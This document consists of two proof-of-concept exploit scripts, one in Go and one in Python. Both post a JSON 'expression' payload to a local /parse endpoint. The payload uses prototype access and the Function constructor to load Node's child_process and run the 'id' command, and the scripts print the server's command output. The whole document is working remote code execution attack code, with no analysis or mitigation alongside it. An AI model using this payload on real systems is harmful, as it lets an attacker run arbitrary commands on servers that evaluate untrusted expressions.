File: poc.go
package main

import (
	"bytes"
	"fmt"
	"io/ioutil"
	"net/http"
)

func main() {
	// Target URL (replace with your local or test target)
	targetURL := "http://localhost:8080/parse"

	// Malicious payload to execute a system command
	payload := `{"expression": "__proto__.toString.constructor('require(\"child_process\").execSync(\"id\").toString()')()"}`

	// Send HTTP POST request with the malicious payload
	resp, err := http.Post(targetURL, "application/json", bytes.NewBuffer([]byte(payload)))
	if err != nil {
		fmt.Println("Error sending the payload:", err)
		return
	}
	defer resp.Body.Close()

	// Read and print the response
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println("Error reading response:", err)
		return
	}

	fmt.Println("Response from the server (command output):")
	fmt.Println(string(body))
}

File: poc.py
import requests

target_url = "http://localhost:8080/parse"

malicious_payload = {
    "expression": "__proto__.toString.constructor('require(\"child_process\").execSync(\"id\").toString()')()"
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, json=malicious_payload)

    if response.status_code == 200:
        print("Application response (command output):")
        print(response.json().get("result", "No output"))
    else:
        print(f"Error: Received status code {response.status_code}.")
except Exception as e:
    print(f"Error while sending the payload: {e}")
